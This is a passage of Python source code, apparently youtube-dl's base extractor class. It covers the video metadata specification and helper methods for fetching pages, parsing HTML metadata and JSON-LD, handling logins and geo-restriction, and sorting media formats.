* "resolution" (optional, string "{width}x{height"},
deprecated)
* "filesize" (optional, int)
thumbnail: Full URL to a video thumbnail image.
description: Full video description.
uploader: Full name of the video uploader.
license: License name the video is licensed under.
creator: The creator of the video.
release_date: The date (YYYYMMDD) when the video was released.
timestamp: UNIX timestamp of the moment the video became available.
upload_date: Video upload date (YYYYMMDD).
If not explicitly set, calculated from timestamp.
uploader_id: Nickname or id of the video uploader.
uploader_url: Full URL to a personal webpage of the video uploader.
location: Physical location where the video was filmed.
subtitles: The available subtitles as a dictionary in the format
{tag: subformats}. "tag" is usually a language code, and
"subformats" is a list sorted from lower to higher
preference, each element is a dictionary with the "ext"
entry and one of:
* "data": The subtitles file contents
* "url": A URL pointing to the subtitles file
"ext" will be calculated from URL if missing
automatic_captions: Like 'subtitles', used by the YoutubeIE for
automatically generated captions
duration: Length of the video in seconds, as an integer or float.
view_count: How many users have watched the video on the platform.
like_count: Number of positive ratings of the video
dislike_count: Number of negative ratings of the video
repost_count: Number of reposts of the video
average_rating: Average rating give by users, the scale used depends on the webpage
comment_count: Number of comments on the video
comments: A list of comments, each with one or more of the following
properties (all but one of text or html optional):
* "author" - human-readable name of the comment author
* "author_id" - user ID of the comment author
* "id" - Comment ID
* "html" - Comment as HTML
* "text" - Plain text of the comment
* "timestamp" - UNIX timestamp of comment
* "parent" - ID of the comment this one is replying to.
Set to "root" to indicate that this is a
comment to the original video.
age_limit: Age restriction for the video, as an integer (years)
webpage_url: The URL to the video webpage, if given to youtube-dl it
should allow to get the same result again. (It will be set
by YoutubeDL if it's missing)
categories: A list of categories that the video falls in, for example
["Sports", "Berlin"]
tags: A list of tags assigned to the video, e.g. ["sweden", "pop music"]
is_live: True, False, or None (=unknown). Whether this video is a
live stream that goes on instead of a fixed-length video.
start_time: Time in seconds where the reproduction should start, as
specified in the URL.
end_time: Time in seconds where the reproduction should end, as
specified in the URL.
The following fields should only be used when the video belongs to some logical
chapter or section:
chapter: Name or title of the chapter the video belongs to.
chapter_number: Number of the chapter the video belongs to, as an integer.
chapter_id: Id of the chapter the video belongs to, as a unicode string.
The following fields should only be used when the video is an episode of some
series, programme or podcast:
series: Title of the series or programme the video episode belongs to.
season: Title of the season the video episode belongs to.
season_number: Number of the season the video episode belongs to, as an integer.
season_id: Id of the season the video episode belongs to, as a unicode string.
episode: Title of the video episode. Unlike mandatory video title field,
this field should denote the exact title of the video episode
without any kind of decoration.
episode_number: Number of the video episode within a season, as an integer.
episode_id: Id of the video episode, as a unicode string.
The following fields should only be used when the media is a track or a part of
a music album:
track: Title of the track.
track_number: Number of the track within an album or a disc, as an integer.
track_id: Id of the track (useful in case of custom indexing, e.g. 6.iii),
as a unicode string.
artist: Artist(s) of the track.
genre: Genre(s) of the track.
album: Title of the album the track belongs to.
album_type: Type of the album (e.g. "Demo", "Full-length", "Split", "Compilation", etc).
album_artist: List of all artists appeared on the album (e.g.
"Ash Borer / Fell Voices" or "Various Artists", useful for splits
and compilations).
disc_number: Number of the disc or other physical medium the track belongs to,
as an integer.
release_year: Year (YYYY) when the album was released.
Unless mentioned otherwise, the fields should be Unicode strings.
Unless mentioned otherwise, None is equivalent to absence of information.
_type "playlist" indicates multiple videos.
There must be a key "entries", which is a list, an iterable, or a PagedList
object, each element of which is a valid dictionary by this specification.
Additionally, playlists can have "title", "description" and "id" attributes
with the same semantics as videos (see above).
_type "multi_video" indicates that there are multiple videos that
form a single show, for examples multiple acts of an opera or TV episode.
It must have an entries key like a playlist and contain all the keys
required for a video at the same time.
_type "url" indicates that the video must be extracted from another
location, possibly by a different extractor. Its only required key is:
"url" - the next URL to extract.
The key "ie_key" can be set to the class name (minus the trailing "IE",
e.g. "Youtube") if the extractor class is known in advance.
Additionally, the dictionary may have any properties of the resolved entity
known in advance, for example "title" if the title of the referred video is
known ahead of time.
_type "url_transparent" entities have the same specification as "url", but
indicate that the given additional information is more precise than the one
associated with the resolved URL.
This is useful when a site employs a video service that hosts the video and
its technical metadata, but that video service does not embed a useful
title, description etc.
Subclasses of this one should re-define the _real_initialize() and
_real_extract() methods and define a _VALID_URL regexp.
Probably, they should also be added to the list of extractors.
_GEO_BYPASS attribute may be set to False in order to disable
geo restriction bypass mechanisms for a particular extractor.
Though it won't disable explicit geo restriction bypass based on
country code provided with geo_bypass_country. (experimental)
_GEO_COUNTRIES attribute may contain a list of presumably geo unrestricted
countries for this extractor. One of these countries will be used by
geo restriction bypass mechanism right away in order to bypass
geo restriction, of course, if the mechanism is not disabled. (experimental)
NB: both these geo attributes are experimental and may change in future
or be completely removed.
Finally, the _WORKING attribute should be set to False for broken IEs
in order to warn the users and skip the tests.
"""
_ready = False
_downloader = None
_x_forwarded_for_ip = None
_GEO_BYPASS = True
_GEO_COUNTRIES = None
_WORKING = True
def __init__(self, downloader=None):
"""Constructor. Receives an optional downloader."""
self._ready = False
self._x_forwarded_for_ip = None
self.set_downloader(downloader)
@classmethod
def suitable(cls, url):
"""Receives a URL and returns True if suitable for this IE."""
# This does not use has/getattr intentionally - we want to know whether
# we have cached the regexp for *this* class, whereas getattr would also
# match the superclass
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
return cls._VALID_URL_RE.match(url) is not None
@classmethod
def _match_id(cls, url):
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
m = cls._VALID_URL_RE.match(url)
assert m
return m.group('id')
@classmethod
def working(cls):
"""Getter method for _WORKING."""
return cls._WORKING
def initialize(self):
"""Initializes an instance (authentication, etc)."""
self._initialize_geo_bypass(self._GEO_COUNTRIES)
if not self._ready:
self._real_initialize()
self._ready = True
def _initialize_geo_bypass(self, countries):
"""
Initialize geo restriction bypass mechanism.
This method is used to initialize geo bypass mechanism based on faking
X-Forwarded-For HTTP header. A random country from provided country list
is selected and a random IP belonging to this country is generated. This
IP will be passed as X-Forwarded-For HTTP header in all subsequent
HTTP requests.
This method will be used for initial geo bypass mechanism initialization
during the instance initialization with _GEO_COUNTRIES.
You may also manually call it from extractor's code if geo countries
information is not available beforehand (e.g. obtained during
extraction) or due to some another reason.
"""
if not self._x_forwarded_for_ip:
country_code = self._downloader.params.get('geo_bypass_country', None)
# If there is no explicit country for geo bypass specified and
# the extractor is known to be geo restricted let's fake IP
# as X-Forwarded-For right away.
if (not country_code and
self._GEO_BYPASS and
self._downloader.params.get('geo_bypass', True) and
countries):
country_code = random.choice(countries)
if country_code:
self._x_forwarded_for_ip = GeoUtils.random_ipv4(country_code)
if self._downloader.params.get('verbose', False):
self._downloader.to_stdout(
'[debug] Using fake IP %s (%s) as X-Forwarded-For.'
% (self._x_forwarded_for_ip, country_code.upper()))
def extract(self, url):
"""Extracts URL information and returns it in list of dicts."""
try:
for _ in range(2):
try:
self.initialize()
ie_result = self._real_extract(url)
if self._x_forwarded_for_ip:
ie_result['__x_forwarded_for_ip'] = self._x_forwarded_for_ip
return ie_result
except GeoRestrictedError as e:
if self.__maybe_fake_ip_and_retry(e.countries):
continue
raise
except ExtractorError:
raise
except compat_http_client.IncompleteRead as e:
raise ExtractorError('A network error has occurred.', cause=e, expected=True)
except (KeyError, StopIteration) as e:
raise ExtractorError('An extractor error has occurred.', cause=e)
def __maybe_fake_ip_and_retry(self, countries):
if (not self._downloader.params.get('geo_bypass_country', None) and
self._GEO_BYPASS and
self._downloader.params.get('geo_bypass', True) and
not self._x_forwarded_for_ip and
countries):
country_code = random.choice(countries)
self._x_forwarded_for_ip = GeoUtils.random_ipv4(country_code)
if self._x_forwarded_for_ip:
self.report_warning(
'Video is geo restricted. Retrying extraction with fake IP %s (%s) as X-Forwarded-For.'
% (self._x_forwarded_for_ip, country_code.upper()))
return True
return False
def set_downloader(self, downloader):
"""Sets the downloader for this IE."""
self._downloader = downloader
def _real_initialize(self):
"""Real initialization process. Redefine in subclasses."""
pass
def _real_extract(self, url):
"""Real extraction process. Redefine in subclasses."""
pass
@classmethod
def ie_key(cls):
"""A string for getting the InfoExtractor with get_info_extractor"""
return compat_str(cls.__name__[:-2])
@property
def IE_NAME(self):
return compat_str(type(self).__name__[:-2])
def _request_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, data=None, headers={}, query={}):
""" Returns the response handle """
if note is None:
self.report_download_webpage(video_id)
elif note is not False:
if video_id is None:
self.to_screen('%s' % (note,))
else:
self.to_screen('%s: %s' % (video_id, note))
if isinstance(url_or_request, compat_urllib_request.Request):
url_or_request = update_Request(
url_or_request, data=data, headers=headers, query=query)
else:
if query:
url_or_request = update_url_query(url_or_request, query)
if data is not None or headers:
url_or_request = sanitized_Request(url_or_request, data, headers)
try:
return self._downloader.urlopen(url_or_request)
except (compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error) as err:
if errnote is False:
return False
if errnote is None:
errnote = 'Unable to download webpage'
errmsg = '%s: %s' % (errnote, error_to_compat_str(err))
if fatal:
raise ExtractorError(errmsg, sys.exc_info()[2], cause=err)
else:
self._downloader.report_warning(errmsg)
return False
def _download_webpage_handle(self, url_or_request, video_id, note=None, errnote=None, fatal=True, encoding=None, data=None, headers={}, query={}):
""" Returns a tuple (page content as string, URL handle) """
# Strip hashes from the URL (#1038)
if isinstance(url_or_request, (compat_str, str)):
url_or_request = url_or_request.partition('#')[0]
# Some sites check X-Forwarded-For HTTP header in order to figure out
# the origin of the client behind proxy. This allows bypassing geo
# restriction by faking this header's value to IP that belongs to some
# geo unrestricted country. We will do so once we encounter any
# geo restriction error.
if self._x_forwarded_for_ip:
if 'X-Forwarded-For' not in headers:
headers['X-Forwarded-For'] = self._x_forwarded_for_ip
urlh = self._request_webpage(url_or_request, video_id, note, errnote, fatal, data=data, headers=headers, query=query)
if urlh is False:
assert not fatal
return False
content = self._webpage_read_content(urlh, url_or_request, video_id, note, errnote, fatal, encoding=encoding)
return (content, urlh)
@staticmethod
def _guess_encoding_from_content(content_type, webpage_bytes):
m = re.match(r'[a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+\s*;\s*charset=(.+)', content_type)
if m:
encoding = m.group(1)
else:
m = re.search(br'<meta[^>]+charset=[\'"]?([^\'")]+)[ /\'">]',
webpage_bytes[:1024])
if m:
encoding = m.group(1).decode('ascii')
elif webpage_bytes.startswith(b'\xff\xfe'):
encoding = 'utf-16'
else:
encoding = 'utf-8'
return encoding
def _webpage_read_content(self, urlh, url_or_request, video_id, note=None, errnote=None, fatal=True, prefix=None, encoding=None):
content_type = urlh.headers.get('Content-Type', '')
webpage_bytes = urlh.read()
if prefix is not None:
webpage_bytes = prefix + webpage_bytes
if not encoding:
encoding = self._guess_encoding_from_content(content_type, webpage_bytes)
if self._downloader.params.get('dump_intermediate_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
self.to_screen('Dumping request to ' + url)
dump = base64.b64encode(webpage_bytes).decode('ascii')
self._downloader.to_screen(dump)
if self._downloader.params.get('write_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
basen = '%s_%s' % (video_id, url)
if len(basen) > 240:
h = '___' + hashlib.md5(basen.encode('utf-8')).hexdigest()
basen = basen[:240 - len(h)] + h
raw_filename = basen + '.dump'
filename = sanitize_filename(raw_filename, restricted=True)
self.to_screen('Saving request to ' + filename)
# Working around MAX_PATH limitation on Windows (see
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
if compat_os_name == 'nt':
absfilepath = os.path.abspath(filename)
if len(absfilepath) > 259:
filename = '\\\\?\\' + absfilepath
with open(filename, 'wb') as outf:
outf.write(webpage_bytes)
try:
content = webpage_bytes.decode(encoding, 'replace')
except LookupError:
content = webpage_bytes.decode('utf-8', 'replace')
if ('<title>Access to this site is blocked</title>' in content and
'Websense' in content[:512]):
msg = 'Access to this webpage has been blocked by Websense filtering software in your network.'
blocked_iframe = self._html_search_regex(
r'<iframe src="([^"]+)"', content,
'Websense information URL', default=None)
if blocked_iframe:
msg += ' Visit %s for more details' % blocked_iframe
raise ExtractorError(msg, expected=True)
if '<title>The URL you requested has been blocked</title>' in content[:512]:
msg = (
'Access to this webpage has been blocked by Indian censorship. '
'Use a VPN or proxy server (with --proxy) to route around it.')
block_msg = self._html_search_regex(
r'</h1><p>(.*?)</p>',
content, 'block message', default=None)
if block_msg:
msg += ' (Message: "%s")' % block_msg.replace('\n', ' ')
raise ExtractorError(msg, expected=True)
return content
def _download_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, tries=1, timeout=5, encoding=None, data=None, headers={}, query={}):
""" Returns the data of the page as a string """
success = False
try_count = 0
while success is False:
try:
res = self._download_webpage_handle(url_or_request, video_id, note, errnote, fatal, encoding=encoding, data=data, headers=headers, query=query)
success = True
except compat_http_client.IncompleteRead as e:
try_count += 1
if try_count >= tries:
raise e
self._sleep(timeout, video_id)
if res is False:
return res
else:
content, _ = res
return content
def _download_xml(self, url_or_request, video_id,
note='Downloading XML', errnote='Unable to download XML',
transform_source=None, fatal=True, encoding=None, data=None, headers={}, query={}):
"""Return the xml as an xml.etree.ElementTree.Element"""
xml_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal, encoding=encoding, data=data, headers=headers, query=query)
if xml_string is False:
return xml_string
if transform_source:
xml_string = transform_source(xml_string)
return compat_etree_fromstring(xml_string.encode('utf-8'))
def _download_json(self, url_or_request, video_id,
note='Downloading JSON metadata',
errnote='Unable to download JSON metadata',
transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={}):
json_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal,
encoding=encoding, data=data, headers=headers, query=query)
if (not fatal) and json_string is False:
return None
return self._parse_json(
json_string, video_id, transform_source=transform_source, fatal=fatal)
def _parse_json(self, json_string, video_id, transform_source=None, fatal=True):
if transform_source:
json_string = transform_source(json_string)
try:
return json.loads(json_string)
except ValueError as ve:
errmsg = '%s: Failed to parse JSON ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def report_warning(self, msg, video_id=None):
idstr = '' if video_id is None else '%s: ' % video_id
self._downloader.report_warning(
'[%s] %s%s' % (self.IE_NAME, idstr, msg))
def to_screen(self, msg):
"""Print msg to screen, prefixing it with '[ie_name]'"""
self._downloader.to_screen('[%s] %s' % (self.IE_NAME, msg))
def report_extraction(self, id_or_name):
"""Report information extraction."""
self.to_screen('%s: Extracting information' % id_or_name)
def report_download_webpage(self, video_id):
"""Report webpage download."""
self.to_screen('%s: Downloading webpage' % video_id)
def report_age_confirmation(self):
"""Report attempt to confirm age."""
self.to_screen('Confirming age')
def report_login(self):
"""Report attempt to log in."""
self.to_screen('Logging in')
@staticmethod
def raise_login_required(msg='This video is only available for registered users'):
raise ExtractorError(
'%s. Use --username and --password or --netrc to provide account credentials.' % msg,
expected=True)
@staticmethod
def raise_geo_restricted(msg='This video is not available from your location due to geo restriction', countries=None):
raise GeoRestrictedError(msg, countries=countries)
# Methods for following #608
@staticmethod
def url_result(url, ie=None, video_id=None, video_title=None):
"""Returns a URL that points to a page that should be processed"""
# TODO: ie should be the class used for getting the info
video_info = {'_type': 'url',
'url': url,
'ie_key': ie}
if video_id is not None:
video_info['id'] = video_id
if video_title is not None:
video_info['title'] = video_title
return video_info
@staticmethod
def playlist_result(entries, playlist_id=None, playlist_title=None, playlist_description=None):
"""Returns a playlist"""
video_info = {'_type': 'playlist',
'entries': entries}
if playlist_id:
video_info['id'] = playlist_id
if playlist_title:
video_info['title'] = playlist_title
if playlist_description:
video_info['description'] = playlist_description
return video_info
def _search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Perform a regex search on the given string, using a single or a list of
patterns returning the first matching group.
In case of failure return a default value or raise a WARNING or a
RegexNotFoundError, depending on fatal, specifying the field name.
"""
if isinstance(pattern, (str, compat_str, compiled_regex_type)):
mobj = re.search(pattern, string, flags)
else:
for p in pattern:
mobj = re.search(p, string, flags)
if mobj:
break
if not self._downloader.params.get('no_color') and compat_os_name != 'nt' and sys.stderr.isatty():
_name = '\033[0;34m%s\033[0m' % name
else:
_name = name
if mobj:
if group is None:
# return the first matching group
return next(g for g in mobj.groups() if g is not None)
else:
return mobj.group(group)
elif default is not NO_DEFAULT:
return default
elif fatal:
raise RegexNotFoundError('Unable to extract %s' % _name)
else:
self._downloader.report_warning('unable to extract %s' % _name + bug_reports_message())
return None
def _html_search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Like _search_regex, but strips HTML tags and unescapes entities.
"""
res = self._search_regex(pattern, string, name, default, fatal, flags, group)
if res:
return clean_html(res).strip()
else:
return res
def _get_netrc_login_info(self, netrc_machine=None):
username = None
password = None
netrc_machine = netrc_machine or self._NETRC_MACHINE
if self._downloader.params.get('usenetrc', False):
try:
info = netrc.netrc().authenticators(netrc_machine)
if info is not None:
username = info[0]
password = info[2]
else:
raise netrc.NetrcParseError(
'No authenticators for %s' % netrc_machine)
except (IOError, netrc.NetrcParseError) as err:
self._downloader.report_warning(
'parsing .netrc: %s' % error_to_compat_str(err))
return username, password
def _get_login_info(self, username_option='username', password_option='password', netrc_machine=None):
"""
Get the login info as (username, password)
First look for the manually specified credentials using username_option
and password_option as keys in params dictionary. If no such credentials
available look in the netrc file using the netrc_machine or _NETRC_MACHINE
value.
If there's no info available, return (None, None)
"""
if self._downloader is None:
return (None, None)
downloader_params = self._downloader.params
# Attempt to use provided username and password or .netrc data
if downloader_params.get(username_option) is not None:
username = downloader_params[username_option]
password = downloader_params[password_option]
else:
username, password = self._get_netrc_login_info(netrc_machine)
return username, password
def _get_tfa_info(self, note='two-factor verification code'):
"""
Get the two-factor authentication info
TODO - asking the user will be required for sms/phone verify
currently just uses the command line option
If there's no info available, return None
"""
if self._downloader is None:
return None
downloader_params = self._downloader.params
if downloader_params.get('twofactor') is not None:
return downloader_params['twofactor']
return compat_getpass('Type %s and press [Return]: ' % note)
# Helper functions for extracting OpenGraph info
@staticmethod
def _og_regexes(prop):
content_re = r'content=(?:"([^"]+?)"|\'([^\']+?)\'|\s*([^\s"\'=<>`]+?))'
property_re = (r'(?:name|property)=(?:\'og:%(prop)s\'|"og:%(prop)s"|\s*og:%(prop)s\b)'
% {'prop': re.escape(prop)})
template = r'<meta[^>]+?%s[^>]+?%s'
return [
template % (property_re, content_re),
template % (content_re, property_re),
]
@staticmethod
def _meta_regex(prop):
return r'''(?isx)<meta
(?=[^>]+(?:itemprop|name|property|id|http-equiv)=(["\']?)%s\1)
[^>]+?content=(["\'])(?P<content>.*?)\2''' % re.escape(prop)
def _og_search_property(self, prop, html, name=None, **kargs):
if not isinstance(prop, (list, tuple)):
prop = [prop]
if name is None:
name = 'OpenGraph %s' % prop[0]
og_regexes = []
for p in prop:
og_regexes.extend(self._og_regexes(p))
escaped = self._search_regex(og_regexes, html, name, flags=re.DOTALL, **kargs)
if escaped is None:
return None
return unescapeHTML(escaped)
def _og_search_thumbnail(self, html, **kargs):
return self._og_search_property('image', html, 'thumbnail URL', fatal=False, **kargs)
def _og_search_description(self, html, **kargs):
return self._og_search_property('description', html, fatal=False, **kargs)
def _og_search_title(self, html, **kargs):
return self._og_search_property('title', html, **kargs)
def _og_search_video_url(self, html, name='video url', secure=True, **kargs):
regexes = self._og_regexes('video') + self._og_regexes('video:url')
if secure:
regexes = self._og_regexes('video:secure_url') + regexes
return self._html_search_regex(regexes, html, name, **kargs)
def _og_search_url(self, html, **kargs):
return self._og_search_property('url', html, **kargs)
def _html_search_meta(self, name, html, display_name=None, fatal=False, **kwargs):
if not isinstance(name, (list, tuple)):
name = [name]
if display_name is None:
display_name = name[0]
return self._html_search_regex(
[self._meta_regex(n) for n in name],
html, display_name, fatal=fatal, group='content', **kwargs)
def _dc_search_uploader(self, html):
return self._html_search_meta('dc.creator', html, 'uploader')
def _rta_search(self, html):
# See http://www.rtalabel.org/index.php?content=howtofaq#single
if re.search(r'(?ix)<meta\s+name="rating"\s+'
r' content="RTA-5042-1996-1400-1577-RTA"',
html):
return 18
return 0
def _media_rating_search(self, html):
# See http://www.tjg-designs.com/WP/metadata-code-examples-adding-metadata-to-your-web-pages/
rating = self._html_search_meta('rating', html)
if not rating:
return None
RATING_TABLE = {
'safe for kids': 0,
'general': 8,
'14 years': 14,
'mature': 17,
'restricted': 19,
}
return RATING_TABLE.get(rating.lower())
def _family_friendly_search(self, html):
# See http://schema.org/VideoObject
family_friendly = self._html_search_meta('isFamilyFriendly', html)
if not family_friendly:
return None
RATING_TABLE = {
'1': 0,
'true': 0,
'0': 18,
'false': 18,
}
return RATING_TABLE.get(family_friendly.lower())
def _twitter_search_player(self, html):
return self._html_search_meta('twitter:player', html,
'twitter card player')
def _search_json_ld(self, html, video_id, expected_type=None, **kwargs):
json_ld = self._search_regex(
r'(?s)<script[^>]+type=(["\'])application/ld\+json\1[^>]*>(?P<json_ld>.+?)</script>',
html, 'JSON-LD', group='json_ld', **kwargs)
default = kwargs.get('default', NO_DEFAULT)
if not json_ld:
return default if default is not NO_DEFAULT else {}
# JSON-LD may be malformed and thus `fatal` should be respected.
# At the same time `default` may be passed that assumes `fatal=False`
# for _search_regex. Let's simulate the same behavior here as well.
fatal = kwargs.get('fatal', True) if default == NO_DEFAULT else False
return self._json_ld(json_ld, video_id, fatal=fatal, expected_type=expected_type)
def _json_ld(self, json_ld, video_id, fatal=True, expected_type=None):
if isinstance(json_ld, compat_str):
json_ld = self._parse_json(json_ld, video_id, fatal=fatal)
if not json_ld:
return {}
info = {}
if not isinstance(json_ld, (list, tuple, dict)):
return info
if isinstance(json_ld, dict):
json_ld = [json_ld]
for e in json_ld:
if e.get('@context') == 'http://schema.org':
item_type = e.get('@type')
if expected_type is not None and expected_type != item_type:
return info
if item_type == 'TVEpisode':
info.update({
'episode': unescapeHTML(e.get('name')),
'episode_number': int_or_none(e.get('episodeNumber')),
'description': unescapeHTML(e.get('description')),
})
part_of_season = e.get('partOfSeason')
if isinstance(part_of_season, dict) and part_of_season.get('@type') == 'TVSeason':
info['season_number'] = int_or_none(part_of_season.get('seasonNumber'))
part_of_series = e.get('partOfSeries') or e.get('partOfTVSeries')
if isinstance(part_of_series, dict) and part_of_series.get('@type') == 'TVSeries':
info['series'] = unescapeHTML(part_of_series.get('name'))
elif item_type == 'Article':
info.update({
'timestamp': parse_iso8601(e.get('datePublished')),
'title': unescapeHTML(e.get('headline')),
'description': unescapeHTML(e.get('articleBody')),
})
elif item_type == 'VideoObject':
info.update({
'url': e.get('contentUrl'),
'title': unescapeHTML(e.get('name')),
'description': unescapeHTML(e.get('description')),
'thumbnail': e.get('thumbnailUrl') or e.get('thumbnailURL'),
'duration': parse_duration(e.get('duration')),
'timestamp': unified_timestamp(e.get('uploadDate')),
'filesize': float_or_none(e.get('contentSize')),
'tbr': int_or_none(e.get('bitrate')),
'width': int_or_none(e.get('width')),
'height': int_or_none(e.get('height')),
})
break
return dict((k, v) for k, v in info.items() if v is not None)
@staticmethod
def _hidden_inputs(html):
html = re.sub(r'<!--(?:(?!<!--).)*-->', '', html)
hidden_inputs = {}
for input in re.findall(r'(?i)(<input[^>]+>)', html):
attrs = extract_attributes(input)
if not input:
continue
if attrs.get('type') not in ('hidden', 'submit'):
continue
name = attrs.get('name') or attrs.get('id')
value = attrs.get('value')
if name and value is not None:
hidden_inputs[name] = value
return hidden_inputs
def _form_hidden_inputs(self, form_id, html):
form = self._search_regex(
r'(?is)<form[^>]+?id=(["\'])%s\1[^>]*>(?P<form>.+?)</form>' % form_id,
html, '%s form' % form_id, group='form')
return self._hidden_inputs(form)
def _sort_formats(self, formats, field_preference=None):
if not formats:
raise ExtractorError('No video formats found')
for f in formats:
# Automatically determine tbr when missing based on abr and vbr (improves
# formats sorting in some cases)
if 'tbr' not in f and f.get('abr') is not None and f.get('vbr') is not None:
f['tbr'] = f['abr'] + f['vbr']
def _formats_key(f):
# TODO remove the following workaround
from ..utils import determine_ext
if not f.get('ext') and 'url' in f:
f['ext'] = determine_ext(f['url'])
if isinstance(field_preference, (list, tuple)):
return tuple(
f.get(field)
if f.get(field) is not None
else ('' if field == 'format_id' else -1)
for field in field_preference)
preference = f.get('preference')
if preference is None:
preference = 0
if f.get('ext') in ['f4f', 'f4m']: # Not yet supported
preference -= 0.5
protocol = f.get('protocol') or determine_protocol(f)
proto_preference = 0 if protocol in ['http', 'https'] else (-0.5 if protocol == 'rtsp' else -0.1)
if f.get('vcodec') == 'none': # audio only
preference -= 50
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['aac', 'mp3', 'm4a', 'webm', 'ogg', 'opus']
else:
ORDER = ['webm', 'opus', 'ogg', 'mp3', 'aac', 'm4a']
ext_preference = 0
try:
audio_ext_preference = ORDER.index(f['ext'])
except ValueError:
audio_ext_preference = -1
else:
if f.get('acodec') == 'none': # video only
preference -= 40
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['flv', 'mp4', 'webm']
else:
ORDER = ['webm', 'flv', 'mp4']
try:
ext_preference = ORDER.index(f['ext'])
except ValueError:
ext_preference = -1
audio_ext_preference = 0
return (
preference,
f.get('language_preference') if f.get('language_preference') is not None else -1,
f.get('quality') if f.get('quality') is not None else -1,
f.get('tbr') if f.get('tbr') is not None else -1,
f.get('filesize') if f.get('filesize') is not None else -1,
f.get('vbr') if f.get('vbr') is not None else -1,
f.get('height') if f.get('height') is not None else -1,
f.get('width') if f.get('width') is not None else -1,
proto_preference,
ext_preference,
f.get('abr') if f.get('abr') is not None else -1,
audio_ext_preference,
f.get('fps') if f.get('fps') is not None else -1,
f.get('filesize_approx') if f.get('filesize_approx') is not None else -1,
f.get('source_preference') if f.get('source_preference') is not None else -1,
f.get('format_id') if f.get('format_id') is not None else '',
)
formats.sort(key=_formats_key)
def _check_formats(self, formats, video_id):
if formats:
formats[:] = filter(
lambda f: self._is_valid_url(
f['url'], video_id,
item='%s video format' % f.get('format_id') if f.get('format_id') else 'video'),
formats)
@staticmethod
def _remove_duplicate_formats(formats):
format_urls = set()
unique_formats = []
for f in formats:
if f['url'] not in format_urls:
format_urls.add(f['url'])
unique_formats.append(f)
formats[:] = unique_formats
def _is_valid_url(self, url, video_id, item='video', headers={}):
url = self._proto_relative_url(url, scheme='http:')
# For now assume non HTTP(S) URLs always valid
if not (url.startswith('http://') or url.startswith('https://')):
return True
try:
self._request_webpage(url, video_id, 'Checking %s URL' % item, headers=headers)
return True
except ExtractorError as e:
if isinstance(e.cause, compat_urllib_error.URLError):
self.to_screen(
'%s: %s URL is invalid, skipping' % (video_id, item))
return False
raise
def http_scheme(self):
""" Either "http:" or "https:", depending on the user's preferences """
return (
'http:'
if self._downloader.params.get('prefer_insecure', False)
else 'https:')
def _proto_relative_url(self, url, scheme=None):
if url is None:
return url
if url.startswith('//'):
if scheme is None:
scheme = self.http_scheme()
return scheme + url
else:
return url
def _sleep(self, timeout, video_id, msg_template=None):
if msg_template is None:
msg_template = '%(video_id)s: Waiting for %(timeout)s seconds'
msg = msg_template % {'video_id': video_id, 'timeout': timeout}
self.to_screen(msg)
time.sleep(timeout)
def _extract_f4m_formats(self, manifest_url, video_id, preference=None, f4m_id=None,
transform_source=lambda s: fix_xml_ampersands(s).strip(),
fatal=True, m3u8_id=None):
manifest = self._download_xml(
manifest_url, video_id, 'Downloading f4m manifest',
'Unable to download f4m manifest',
# Some manifests may be malformed, e.g. prosiebensat1 generated manifests
# (see https://github.com/rg3/youtube-dl/issues/6215#issuecomment-121704244)
transform_source=transform_source,
fatal=fatal)
if manifest is False:
return []
return self._parse_f4m_formats(
manifest, manifest_url, video_id, preference=preference, f4m_id=f4m_id,
transform_source=transform_source, fatal=fatal, m3u8_id=m3u8_id)
def _parse_f4m_formats(self, manifest, manifest_url, video_id, preference=None, f4m_id=None,
transform_source=lambda s: fix_xml_ampersands(s).strip(),
fatal=True, m3u8_id=None):
# currently youtube-dl cannot decode the playerVerificationChallenge as Akamai uses Adobe Alchemy
akamai_pv = manifest.find('{http://ns.adobe.com/f4m/1.0}pv-2.0')
if akamai_pv is not None and ';' in akamai_pv.text:
playerVerificationChallenge = akamai_pv.text.split(';')[0]
if playerVerificationChallenge.strip() != '':
return []
formats = []
manifest_version = '1.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/1.0}media')
if not media_nodes:
manifest_version = '2.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/2.0}media')
# Remove unsupported DRM protected media from final formats
# rendition (see https://github.com/rg3/youtube-dl/issues/8573).
media_nodes = remove_encrypted_media(media_nodes)
if not media_nodes:
return formats
base_url = xpath_text(
manifest, ['{http://ns.adobe.com/f4m/1.0}baseURL', '{http://ns.adobe.com/f4m/2.0}baseURL'],
'base URL', default=None)
if base_url:
base_url = base_url.strip()
bootstrap_info = xpath_element(
manifest, ['{http://ns.adobe.com/f4m/1.0}bootstrapInfo', '{http://ns.adobe.com/f4m/2.0}bootstrapInfo'],
'bootstrap info', default=None)
vcodec = None
mime_type = xpath_text(
manifest, ['{http://ns.adobe.com/f4m/1.0}mimeType', '{http://ns.adobe.com/f4m/2.0}mimeType'],
'base URL', default=None)
if mime_type and mime_type.startswith('audio/'):
vcodec = 'none'
for i, media_el in enumerate(media_nodes):
tbr = int_or_none(media_el.attrib.get('bitrate'))
width = int_or_none(media_el.attrib.get('width'))
height = int_or_none(media_el.attrib.get('height'))
format_id = '-'.join(filter(None, [f4m_id, compat_str(i if tbr is None else tbr)]))
# If <bootstrapInfo> is present, the specified f4m is a
# stream-level manifest, and only set-level manifests may refer to
# external resources. See section 11.4 and section 4 of F4M spec
if bootstrap_info is None:
media_url = None
# @href is introduced in 2.0, see section 11.6 of F4M spec
if manifest_version == '2.0':
